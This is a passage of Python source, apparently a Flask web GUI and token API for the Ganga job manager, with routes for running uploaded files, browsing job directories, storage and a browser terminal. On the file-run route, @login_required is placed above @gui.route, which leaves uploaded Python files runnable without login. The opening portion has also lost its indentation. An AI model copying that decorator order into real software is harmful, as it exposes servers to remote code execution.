config_info = full_config_info if section is None else [s for s in full_config_info if s["name"] == section]
except Exception as err:
# Flash the error in the GUI
flash(str(err), "danger")
return render_template("config.html", title="Config", full_config_info=full_config_info, config_info=config_info)
#Edit gangarc
@gui.route("/config_edit",methods=["GET", "POST"])
@login_required
def edit_config_page():
"""
Edit gangarc file from the GUI
"""
gui_rc = gui.config["GANGA_RC"]
with open(gui_rc, "rt") as f:
ganga_config = f.read()
if request.method == 'POST':
config_ganga = request.form['config-data']
with open(gui_rc, 'w') as f1:
f1.write(str(config_ganga))
flash(".gangarc Edited", "success")
with open(gui_rc, "rt") as f2:
ganga_config = f2.read()
return render_template("config_edit.html", title="Edit gangarc", ganga_config=ganga_config)
@login_required
# Create view
@gui.route("/create", methods=["GET", "POST"])
def create_page():
"""
Handles create route of the GUI.
"""
# Handle file uploads
if request.method == "POST":
# Load from the uploaded file
if "loadfile" in request.files:
loadfile = request.files["loadfile"]
if loadfile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, the save the file
if loadfile and allowed_file(loadfile.filename):
save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
loadfile.save(save_path)
# Load the file
try:
# Query to load the file
response_info = query_internal_api("/internal/load", "get", params={"path": save_path})
except Exception as err:
# Display error in the GUI
flash(str(err), "danger")
return redirect(request.url)
# Success message
flash(response_info.get("message"), "success")
return redirect(request.url)
# Run file using the runfile GPI function
if "runfile" in request.files:
runfile = request.files["runfile"]
if runfile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, save the file
if runfile and allowed_file(runfile.filename):
save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
runfile.save(save_path)
# Run the file
try:
# Query ganga to run the file
response_info = query_internal_api("/internal/runfile", "get", params={"path": save_path})
except Exception as err:
# Display error back to GUI
flash(str(err), "danger")
return redirect(request.url)
# Success message
flash(response_info.get("message"), "success")
return redirect(request.url)
# No file case
flash("No file, retry!", "warning")
return redirect(request.url)
try:
# Query templates info
templates_info = query_internal_api("/internal/templates", "get",
params={"recent": True, "length": "6"})
except Exception as err:
# Display error to GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("create.html", title="Create", templates_info=templates_info)
# Runfile view
@gui.route("/create/runfile", methods=["GET", "POST"])
@login_required
def runfile_page():
"""
Quick create a runfile to be run using the runfile GPI function.
"""
# Runfile path
runfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
# Save runfile data from frontend
if request.method == "POST":
runfile_data = request.form.get("runfile-data")
with open(runfile_path, "w+") as f:
f.write(runfile_data)
# Run the file
try:
# Query ganga to run the file
response_info = query_internal_api("/internal/runfile", "get", params={"path": runfile_path})
flash(response_info["message"], "success")
except Exception as err:
# Display error back in the GUI
flash(str(err), "danger")
return redirect(request.url)
return render_template("runfile.html", title="Runfile")
# Templates view
@gui.route("/templates", methods=["GET", "POST"])
@login_required
def templates_page():
"""
Handles the templates route of the GUI. Displays templates in a tabular form.
"""
# Update filter values
if request.method == "POST":
# Add filter data to user session
session["templates_per_page"] = int(request.form.get("templates-per-page"))
session["templates_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["application", "backend"], ["template-application", "template-backend"])}
# Current page
current_page = int(request.args.get("page")) if request.args.get("page") is not None else 0
# Get user defined value from session
templates_per_page = session["templates_per_page"]
try:
# Query total number of templates
templates_length = query_internal_api("/internal/templates/length", "get", params=session["templates_filter"])
# Calculate number of max pages
number_of_pages = (int(templates_length) // int(templates_per_page)) + 1
# if current page exceeds last possible page, redirect to last page
if current_page >= number_of_pages:
return redirect(url_for("templates_page", page=number_of_pages - 1))
# Add templates filters and range options for query params
params = session["templates_filter"].copy()
params.update({
"recent": True,
"length": templates_per_page,
"offset": current_page
})
# Query templates information
templates_info = query_internal_api("/internal/templates", "get", params=params)
except Exception as err:
# Flash error if any
flash(str(err), "danger")
return redirect(url_for("create_page"))
return render_template("templates.html",
title="Templates",
number_of_pages=number_of_pages,
current_page=current_page,
backends=plugins["backends"],
applications=plugins["applications"],
templates_info=templates_info)
# Jobs view
@gui.route("/jobs", methods=["GET", "POST"])
@login_required
def jobs_page():
    """
    Handles jobs route of the GUI. Displays jobs in a tabular view.
    """
    # Persist updated filter preferences in the user session
    if request.method == "POST":
        session["jobs_per_page"] = int(request.form.get("jobs-per-page"))
        session["jobs_filter"] = {
            "status": request.form.get("job-status"),
            "application": request.form.get("job-application"),
            "backend": request.form.get("job-backend"),
        }
    # Requested page number, defaulting to the first page
    page_arg = request.args.get("page")
    current_page = 0 if page_arg is None else int(page_arg)
    jobs_per_page = session["jobs_per_page"]
    try:
        # Total number of jobs matching the active filters
        jobs_length = query_internal_api("/internal/jobs/length", "get", params=session["jobs_filter"])
        number_of_pages = (int(jobs_length) // int(jobs_per_page)) + 1
        # Clamp out-of-range page requests to the last available page
        if current_page >= number_of_pages:
            return redirect(url_for("jobs_page", page=number_of_pages - 1))
        # Combine the filters with the pagination window
        params = dict(session["jobs_filter"], recent=True,
                      length=jobs_per_page, offset=current_page)
        jobs_info = query_internal_api("/internal/jobs", "get", params=params)
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template("jobs.html",
                           title="Jobs",
                           jobs_info=jobs_info,
                           backends=plugins["backends"],
                           applications=plugins["applications"],
                           number_of_pages=number_of_pages,
                           current_page=current_page,
                           status_color=status_color)
# Job view
@gui.route('/jobs/<int:job_id>')
@login_required
def job_page(job_id: int):
    """
    Handles job route of the GUI. Displays all the information about the job.
    :param job_id: int
    """
    stdout = None
    stderr = None
    try:
        # General job information and its full print representation
        job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
        full_print_info = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")

        def _read_output(name):
            # Content of an output file in the job's output directory, or None if absent
            fpath = os.path.join(job_info["outputdir"], name)
            if not os.path.exists(fpath):
                return None
            with open(fpath) as fobj:
                return fobj.read()

        stdout = _read_output("stdout")
        stderr = _read_output("stderr")
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("jobs_page"))
    return render_template("job.html",
                           title=f"Job {job_id}",
                           job_info=job_info,
                           status_color=status_color,
                           attribute_actions=actions.get("attributes"),
                           method_actions=actions.get("methods"),
                           stdout=stdout,
                           stderr=stderr,
                           full_print_info=full_print_info)
# Export job
@gui.route("/jobs/<int:job_id>/export")
@login_required
def job_export(job_id: int):
    """
    Sends the job file which is generated using export function of GPI.
    :param job_id: int
    """
    # Path at which the GPI export function writes the job description.
    # (Was a pointless f-string with no placeholder; plain literal now.)
    export_path = os.path.join(gui.config["UPLOAD_FOLDER"], "export.txt")
    try:
        # Ask the internal API to export the job to the export path
        # (return payload is not needed, only the side effect of writing the file)
        query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
        # Stream the exported file back to the browser as a download
        return send_file(export_path, as_attachment=True, cache_timeout=0,
                         attachment_filename=f"Job_{job_id}.txt")
    except Exception as err:
        # Display error back to GUI
        flash(str(err), "danger")
        return redirect(url_for("job_page", job_id=job_id))
# Edit job
@gui.route("/jobs/<int:job_id>/edit", methods=["GET", "POST"])
@login_required
def job_edit(job_id: int):
    """
    Show the exported job text on the GUI for it to be edited and submit. Will create a new job after submission.
    :param job_id: int
    """
    # Scratch files used for the load/export round trip
    loadfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
    export_path = os.path.join(gui.config["UPLOAD_FOLDER"], "export.txt")
    if request.method == "POST":
        # Persist the edited job text, then ask the internal API to load it,
        # which creates a new job from the submitted description
        edited_job_info = request.form.get("edited-job-info")
        with open(loadfile_path, "w+") as fobj:
            fobj.write(edited_job_info)
        try:
            response_info = query_internal_api("/internal/load", "get", params={"path": loadfile_path})
        except Exception as exc:
            flash(str(exc), "danger")
            return redirect(request.url)
        flash(response_info["message"], "success")
    try:
        # Export the current job and read back its textual representation for display
        response_info = query_internal_api(f"/internal/jobs/{job_id}/export", "get", params={"path": export_path})
        with open(export_path) as fobj:
            exported_data = fobj.read()
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("job_page", job_id=job_id))
    return render_template("edit_job.html", title=f"Edit Job {job_id}", job_id=job_id, exported_data=exported_data)
# Browse job directory
@gui.route("/job/<int:job_id>/browse", defaults={"path": ""})
@gui.route("/job/<int:job_id>/browse/<path:path>")
@login_required
def job_browse(job_id: int, path):
    """
    Browse directory of the job.
    :param job_id: int
    :param path: str
    """
    try:
        # Query job information
        job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
        # Base directory of the job
        job_base_dir = os.path.dirname(os.path.dirname(job_info["outputdir"]))
    except Exception as err:
        # Display error on the GUI
        flash(str(err), "danger")
        return redirect(url_for("job_page", job_id=job_id))
    # Join the base and the requested path
    abs_path = os.path.join(job_base_dir, path)
    # SECURITY: 'path' is user controlled. Reject any request that resolves
    # outside the job's base directory ('..' segments or symlink escapes).
    real_base = os.path.realpath(job_base_dir)
    if os.path.commonpath([os.path.realpath(abs_path), real_base]) != real_base:
        flash("Invalid path.", "danger")
        return redirect(url_for("job_page", job_id=job_id))
    # URL path variable for going back
    back_path = os.path.dirname(abs_path).replace(job_base_dir, "")
    # If path doesn't exist
    if not os.path.exists(abs_path):
        flash("Directory for this job does not exist.", "warning")
        return redirect(url_for("job_page", job_id=job_id))
    # Check if path is a file and send
    if os.path.isfile(abs_path):
        return send_file(abs_path)
    files_info = []
    # Show directory contents
    files = os.listdir(abs_path)
    # Store directory information
    for file in files:
        files_info.append({
            "file": file,
            "directory": os.path.isdir(os.path.join(abs_path, file))
        })
    return render_template('job_dir.html', title=f"Job {job_id} Directory",
                           job_id=job_id,
                           abs_path=abs_path,
                           files_info=files_info,
                           back_path=back_path)
# Subjobs view
@gui.route("/jobs/<int:job_id>/subjobs", methods=["GET", "POST"])
@login_required
def subjobs_page(job_id: int):
    """
    Handles subjobs view of the GUI. Displays subjobs of a job in a tabular form.
    :param job_id: int
    """
    # Persist updated filter preferences in the client session
    if request.method == "POST":
        session["subjobs_per_page"] = int(request.form.get("subjobs-per-page"))
        session["subjobs_filter"] = {
            "status": request.form.get("subjob-status"),
            "application": request.form.get("subjob-application"),
            "backend": request.form.get("subjob-backend"),
        }
    # Requested page number, defaulting to the first page
    page_arg = request.args.get("page")
    current_page = 0 if page_arg is None else int(page_arg)
    subjobs_per_page = session["subjobs_per_page"]
    try:
        # Total number of subjobs matching the active filters
        subjobs_length = query_internal_api(f"/internal/jobs/{job_id}/subjobs/length", "get",
                                            params=session["subjobs_filter"])
        number_of_pages = (int(subjobs_length) // int(subjobs_per_page)) + 1
        # Clamp out-of-range page requests to the last available page
        if current_page >= number_of_pages:
            return redirect(url_for("subjobs_page", page=number_of_pages - 1, job_id=job_id))
        # Combine the filters with the pagination window
        params = dict(session["subjobs_filter"], recent=True,
                      length=subjobs_per_page, offset=current_page)
        subjobs_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("job_page", job_id=job_id))
    return render_template("subjobs.html",
                           title=f"Subjobs - Job {job_id}",
                           status_color=status_color,
                           number_of_pages=number_of_pages,
                           current_page=current_page,
                           backends=plugins["backends"],
                           applications=plugins["applications"],
                           subjobs_info=subjobs_info,
                           job_id=job_id)
# Subjob view
@gui.route("/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@login_required
def subjob_page(job_id: int, subjob_id: int):
    """
    Handles subjob route of the GUI. Displays extensive details of a subjob.
    :param job_id: int
    :param subjob_id: int
    """
    stdout = None
    stderr = None
    try:
        # Parent job output directory, subjob info and full print representation
        job_outputdir = query_internal_api(f"/internal/jobs/{job_id}/outputdir", "get")
        subjob_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
        full_print_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
        # Path of the subjob directory relative to the job base directory,
        # in the form expected by the job_browse route
        job_dir_basepath = os.path.dirname(os.path.dirname(job_outputdir["outputdir"]))
        subjob_dir_basepath = os.path.dirname(os.path.dirname(subjob_info["outputdir"]))
        browse_path = subjob_dir_basepath.replace(job_dir_basepath, "")

        def _read_output(name):
            # Content of an output file in the subjob's output directory, or None if absent
            fpath = os.path.join(subjob_info["outputdir"], name)
            if not os.path.exists(fpath):
                return None
            with open(fpath) as fobj:
                return fobj.read()

        stdout = _read_output("stdout")
        stderr = _read_output("stderr")
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("subjobs_page", job_id=job_id))
    return render_template("subjob.html",
                           title=f"Subjob {subjob_id} - Job {job_id}",
                           subjob_info=subjob_info,
                           status_color=status_color,
                           attribute_actions=actions["attributes"],
                           method_actions=actions["methods"],
                           stdout=stdout,
                           stderr=stderr,
                           full_print_info=full_print_info,
                           job_id=job_id,
                           browse_path=browse_path)
# Credential view
@gui.route("/credentials")
@login_required
def credentials_page():
    """
    Handles credential store view of the GUI. Displays credentials in a tabular form.
    """
    try:
        # Fetch the credential store contents from the internal API
        credentials_info = query_internal_api("/internal/credentials", "get")
    except Exception as exc:
        # Report the failure on the GUI and fall back to the dashboard
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template('credentials.html', credential_info_list=credentials_info)
@gui.route("/queue", methods=["GET"])
@login_required
def queue_page():
    """
    Displays queues information
    """
    try:
        # Fetch the state of the Ganga worker queues
        queue_info = query_internal_api("/internal/queue", "get")
    except Exception as exc:
        # Report the failure on the GUI and fall back to the dashboard
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    return render_template('queue.html', queue_info_list=queue_info)
# Plugins view
@gui.route('/plugins')
@login_required
def plugins_page():
    """
    Handles plugins route of the GUI. Displays the list of plugins.
    """
    # 'plugins' is a mapping defined elsewhere in this module; the previous
    # try/except wrapped a plain local assignment that could never raise, so
    # the error branch was dead code and has been removed.
    return render_template('plugins.html', plugins_info=plugins)
# Plugin view
@gui.route("/plugin/<plugin_name>")
@login_required
def plugin_page(plugin_name: str):
    """
    Displays information about the plugin like it's docstring.
    :param plugin_name: str
    """
    try:
        # Fetch plugin details (e.g. its docstring) from the internal API
        plugin_info = query_internal_api(f"/internal/plugins/{plugin_name}", "get")
    except Exception as exc:
        # Report the failure and return to the plugins listing
        flash(str(exc), "danger")
        return redirect(url_for("plugins_page"))
    return render_template("plugin.html", title=f"{plugin_name}", plugin_info=plugin_info)
# Ganga logs view
@gui.route("/logs")
@login_required
def logs_page():
    """
    Display the Ganga log file along with the GUI access and error logs.
    """
    # Paths of the three log files shown on the page, in display order
    log_paths = (gui.config["GANGA_LOG"], gui.config["ACCESS_LOG"], gui.config["ERROR_LOG"])
    try:
        contents = []
        for log_path in log_paths:
            with open(log_path, "rt") as fobj:
                contents.append(fobj.read())
    except Exception as exc:
        flash(str(exc), "danger")
        return redirect(url_for("dashboard"))
    ganga_log_data, gui_accesslog_data, gui_errorlog_data = contents
    return render_template("logs.html", title="Logs", ganga_log_data=ganga_log_data,
                           gui_accesslog_data=gui_accesslog_data, gui_errorlog_data=gui_errorlog_data)
@gui.route("/storage", defaults={"path": ""}, methods=["GET", "POST"])
@gui.route("/storage/<path:path>", methods=["GET", "POST"])
@login_required
def storage_page(path):
    """
    A convenience feature to store some file remotely in gangadir/storage
    """
    # Storage folder path
    storage_folder = gui.config["STORAGE_FOLDER"]
    # Join the storage path and the requested path
    abs_path = os.path.join(storage_folder, path)
    # SECURITY: 'path' comes from the URL and is user controlled. Reject any
    # request that resolves outside the storage folder ('..' segments, symlinks).
    real_storage = os.path.realpath(storage_folder)
    if os.path.commonpath([os.path.realpath(abs_path), real_storage]) != real_storage:
        flash("Invalid path.", "danger")
        return redirect(url_for("dashboard"))
    # Handle file uploads
    if request.method == "POST":
        # Uploaded file
        if "storagefile" in request.files:
            storagefile = request.files["storagefile"]
            if storagefile.filename == "":
                flash("No file selected", "warning")
                return redirect(request.url)
            # If valid file, the save the file
            if storagefile:
                # Directory check
                if not os.path.isdir(abs_path):
                    flash("Error while uploading the file", "danger")
                    return redirect(request.url)
                # secure_filename strips directory components from the client-supplied name
                filename = secure_filename(storagefile.filename)
                save_path = os.path.join(abs_path, filename)
                storagefile.save(save_path)
                # Success message
                flash("Successfully uploaded the file.", "success")
                return redirect(request.url)
        # No file case
        flash("No file, retry!", "warning")
        return redirect(request.url)
    # URL path variable for going back
    back_path = os.path.dirname(abs_path).replace(storage_folder, "")
    # If path doesn't exist
    if not os.path.exists(abs_path):
        flash("Directory does not exist.", "warning")
        return redirect(url_for("dashboard"))
    # Check if path is a file and send
    if os.path.isfile(abs_path):
        return send_file(abs_path)
    files_info = []
    # Show directory contents
    files = os.listdir(abs_path)
    # Store directory information
    for file in files:
        files_info.append({
            "file": file,
            "directory": os.path.isdir(os.path.join(abs_path, file))
        })
    return render_template("storage.html", title="Storage",
                           abs_path=abs_path,
                           files_info=files_info,
                           back_path=back_path)
# Serve CLI
@gui.route("/cli")
@login_required
def serve_cli():
    """Serve the in-browser terminal page (frontend of the websocket PTY below)."""
    return render_template("cli.html")
# Establish a websocket connection from the frontend to the server
@socketio.on("connect", namespace="/pty")
def connect():
    """
    New client connected, start reading and writing from the pseudo terminal.
    """
    # Ignore clients when no child PTY process exists or the user is not logged in
    if not (gui.config["CHILD_PID"] and current_user.is_authenticated):
        return
    # Forward pseudo terminal output to the client in the background
    socketio.start_background_task(target=read_and_forward_pty_output)
# Input from the frontend
@socketio.on("pty-input", namespace="/pty")
def pty_input(data):
    """
    Write to the child pty. The pty sees this as if you are typing in a real terminal.
    """
    # Ignore input when no PTY file descriptor exists or the user is not logged in
    if not (gui.config["FD"] and current_user.is_authenticated):
        return
    # Forward keystrokes from the browser terminal to the pseudo terminal
    os.write(gui.config["FD"], data["input"].encode())
# Resize the pseudo terminal when the frontend is resized
@socketio.on("resize", namespace="/pty")
def resize(data):
    """
    Resize the pseudo terminal according to the dimension at the frontend.
    :param data: contains information about rows and cols of the frontend terminal.
    """
    # Ignore the event when no PTY file descriptor exists or the user is not logged in
    if not (gui.config["FD"] and current_user.is_authenticated):
        return
    # Propagate the browser terminal geometry to the pseudo terminal
    set_windowsize(gui.config["FD"], data["rows"], data["cols"])
# ******************** Token Based Authentication ******************** #

# Generate token for API authentication - token validity 5 days
@gui.route("/token", methods=["POST"])
def generate_token():
    """
    Using the 'user' and 'password' data from the form body, validates the user and returns a JSON Web Token (JWT).
    """
    # Credentials from the JSON request body (may be absent)
    request_json = request.json or {}
    request_user = request_json.get("username")
    request_password = request_json.get("password")
    failure = {"success": False, "message": "Could not verify user."}
    # Both username and password are mandatory
    if not request_user or not request_password:
        return jsonify(failure), 401
    # Look the user up and check the password before issuing a token
    user = User.query.filter_by(user=request_user).first()
    if user and user.verify_password(request_password):
        token = user.generate_auth_token().decode("UTF-8")
        return jsonify({"token": token})
    # Authentication failed
    return jsonify(failure), 401
# ******************** Token Authentication Decorator ******************** #

# Decorator for token protected routes
def token_required(f):
    """
    Decorator which validates the request header token in 'X-Access-Token' field, and passes
    the authenticated user as the first argument to the wrapped view.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        # Pull the JWT from the request headers, if present
        token = request.headers.get("X-Access-Token")
        if not token:
            return jsonify({"success": False, "message": "Token is missing"}), 401
        # Decode the token and subsequently identify the user.
        # NOTE: ExpiredSignatureError must be handled before its parent
        # InvalidTokenError to keep the distinct error messages.
        try:
            data = jwt.decode(token, gui.config["SECRET_KEY"], algorithms=["HS256"])
            current_api_user = User.query.filter_by(public_id=data["public_id"]).first()
            if current_api_user is None:
                return jsonify({"success": False, "message": "Token is old. Please renew"}), 401
        except jwt.ExpiredSignatureError:
            return jsonify({"success": False, "message": "Token is expired"}), 401
        except jwt.InvalidTokenError:
            return jsonify({"success": False, "message": "Token is invalid"}), 401
        except Exception:
            # Was a bare 'except:', which also swallowed BaseException
            # (KeyboardInterrupt, SystemExit); narrowed to Exception.
            return jsonify({"success": False, "message": "Could not verify token"}), 401
        return f(current_api_user, *args, **kwargs)
    return decorated
# ******************** Job API ******************** #

# Single job information API - GET Method
@gui.route("/api/jobs/<int:job_id>", methods=["GET"])
@token_required
def job_endpoint(current_api_user, job_id: int):
    """
    Given the job_id, returns the general information related to the job in JSON format.
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # General job information from the internal API
        job_info = query_internal_api(f"/internal/jobs/{job_id}", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(job_info)
# Single job attribute information API - GET Method
@gui.route("/api/jobs/<int:job_id>/<attribute>", methods=["GET"])
@token_required
def job_attribute_endpoint(current_api_user, job_id: int, attribute: str):
    """
    Given the job_id and attribute, returns the attribute information in the JSON format.
    :param job_id: int
    :param attribute: str
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Requested attribute of the job from the internal API
        job_attribute_info = query_internal_api(f"/internal/jobs/{job_id}/{attribute}", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(job_attribute_info)
# Single job full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/full-print", methods=["GET"])
@token_required
def job_full_print_endpoint(current_api_user, job_id: int):
    """
    Return full print of the job.
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Full textual representation of the job from the internal API
        full_print_info = query_internal_api(f"/internal/jobs/{job_id}/full-print", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(full_print_info)
# Create job using template API - POST Method
@gui.route("/api/jobs/create", methods=["POST"])
@token_required
def job_create_endpoint(current_api_user):
    """
    Create a new job using the existing template.
    IMPORTANT: template_id NEEDS to be provided in the request body. job_name can optionally be provided in the request body.
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # Template id (required) and optional job name from the request body
    payload = {
        "template_id": request.json.get("template_id"),
        "job_name": request.json.get("job_name"),
    }
    try:
        # Ask the internal API to instantiate a job from the template
        response_info = query_internal_api("/internal/jobs/create", "post", json=payload)
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(response_info)
# Copy job API - PUT Method
@gui.route("/api/jobs/<int:job_id>/copy", methods=["PUT"])
@token_required
def job_copy_endpoint(current_api_user, job_id: int):
    """
    Create a copy of the job.
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    :param job_id: int
    """
    try:
        # Ask the internal API to duplicate the job
        response_info = query_internal_api(f"/internal/jobs/{job_id}/copy", "put")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(response_info)
# Job action API - PUT Method
@gui.route("/api/jobs/<int:job_id>/<action>", methods=["PUT"])
@token_required
def job_action_endpoint(current_api_user, job_id: int, action: str):
    """
    Given the job_id and action in the endpoint, perform the action on the job.
    The action can be any method or attribute change that can be called on the Job object.
    Example:
    1)
        PUT http://localhost:5000/job/13/resubmit
        The above request will resubmit the job with ID 13.
    2)
        PUT http://localhost:5000/job/13/force_status
        {"force_status":"failed"}
        The above request will force status of the job with ID 13 to killed. If unsuccessful will return back the error.
    3)
        PUT http://localhost:5000/job/13/name
        {"name"="New Name"}
        The above request will change the name of the job with ID 13 to "New Name". Notice how the required values
        are passed in the request body with the same name as action.
    NOTE: It is NECESSARY to send body in JSON format for the request to be parsed in JSON.
    :param job_id: int
    :param action: str
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # Action arguments come straight from the JSON request body
    payload = request.json
    try:
        # Ask the internal API to perform the action on the job
        response_info = query_internal_api(f"/internal/jobs/{job_id}/{action}", "put", json=payload)
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(response_info)
# Job delete API - DELETE Method
@gui.route("/api/jobs/<int:job_id>", methods=["DELETE"])
@token_required
def job_delete_endpoint(current_api_user, job_id: int):
    """
    Given the job id, removes the job from the job repository.
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Ask the internal API to remove the job from the repository
        response_info = query_internal_api(f"/internal/jobs/{job_id}", "delete")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(response_info)
# Pin the Job
@gui.route("/api/jobs/<int:job_id>/pin", methods=["PUT"])
@token_required
def job_pin_endpoint(current_api_user, job_id: int):
    """
    Pin the given job, which is then shown in the dashboard.
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # FIX: use the token-authenticated user rather than flask-login's
    # 'current_user' — pure API clients authenticate via JWT only and have no
    # session cookie, so 'current_user' would be anonymous for them.
    u = current_api_user
    # Load pinned jobs of the user from the database (stored as a JSON list)
    pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
    # Pin job (idempotent: pinning twice keeps a single entry)
    if job_id not in pinned_jobs:
        pinned_jobs.append(job_id)
    # Persist the updated pinned jobs list
    u.pinned_jobs = json.dumps(pinned_jobs)
    db.session.add(u)
    db.session.commit()
    return jsonify({"success": True, "message": f"Successfully pinned Job (ID={job_id})."})
# Unpin the job
@gui.route("/api/jobs/<int:job_id>/unpin", methods=["PUT"])
@token_required
def job_unpin_endpoint(current_api_user, job_id: int):
    """
    Unpin the job, and make the required change to the GUI database.
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # FIX: use the token-authenticated user rather than flask-login's
    # 'current_user' — pure API clients authenticate via JWT only and have no
    # session cookie, so 'current_user' would be anonymous for them.
    u = current_api_user
    # Load user's pinned jobs from the database (stored as a JSON list)
    pinned_jobs = json.loads(u.pinned_jobs) if u.pinned_jobs is not None else []
    # Unpin the job (no-op if it was not pinned)
    if job_id in pinned_jobs:
        pinned_jobs.remove(job_id)
    # Persist the updated pinned jobs list
    u.pinned_jobs = json.dumps(pinned_jobs)
    db.session.add(u)
    db.session.commit()
    return jsonify({"success": True, "message": f"Successfully unpinned Job (ID={job_id})."})
# ******************** Subjobs API ******************** #

# Subjobs API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs", methods=["GET"])
@token_required
def subjobs_endpoint(current_api_user, job_id: int):
    """
    Returns a list subjobs of a particular job in a similar way as Jobs API.
    The parameter accepted are:
        * ids: provide a JSON string of list of IDs
        * status: provide subjob status as a string for filter
        * application: provide subjob application as a string for filter
        * backend: provide backend application as a string for filter
        * recent: if provided, starts a list from recent subjobs to old
        * length: number of subjobs to be returned, provide as a int
        * offset: how many subjobs to skip before returning the specified length of subjobs. Provide as int.
            offset works as: number of subjobs skipped = offset * length
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    # Forward the supported filter/pagination options from the query string
    params = {name: request.args.get(name)
              for name in ("ids", "status", "application", "backend", "recent", "length", "offset")}
    try:
        subjobs_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs", "get", params=params)
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(subjobs_info)
# Single subjob info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>", methods=["GET"])
@token_required
def subjob_endpoint(current_api_user, job_id: int, subjob_id: int):
    """
    Returns information of a single subjob related to a particular job
    :param job_id: int
    :param subjob_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Subjob information from the internal API
        subjob_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(subjob_info)
# Single Subjob Attribute Info API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/<attribute>", methods=["GET"])
@token_required
def subjob_attribute_endpoint(current_api_user, job_id: int, subjob_id: int, attribute: str):
    """
    Given the job id, subjob id and attribute; return the attribute information in the string format via JSON.
    :param job_id: int
    :param subjob_id: int
    :param attribute: str
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Requested attribute of the subjob from the internal API
        subjob_attribute_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/{attribute}", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(subjob_attribute_info)
# Single subjob full print API - GET Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/full-print", methods=["GET"])
@token_required
def subjob_full_print_endpoint(current_api_user, job_id: int, subjob_id: int):
    """
    Return full print of the subjob.
    :param subjob_id: int
    :param job_id: int
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Full textual representation of the subjob from the internal API
        full_print_info = query_internal_api(f"/internal/jobs/{job_id}/subjobs/{subjob_id}/full-print", "get")
    except Exception as exc:
        # Propagate the failure reason to the API client
        return jsonify({"success": False, "message": str(exc)}), 400
    else:
        return jsonify(full_print_info)
# Copy subjob API - PUT Method
@gui.route("/api/jobs/<int:job_id>/subjobs/<int:subjob_id>/copy", methods=["PUT"])
@token_required
def subjob_copy_endpoint(current_api_user, job_id: int, subjob_id: int):
    """
    Create a copy of the subjob into a new job.
    :param job_id:
    :param subjob_id:
    :param current_api_user: Information of the current_api_user based on the request's JWT token
    """
    try:
        # Ask the internal API to duplicate the subjob into a new job
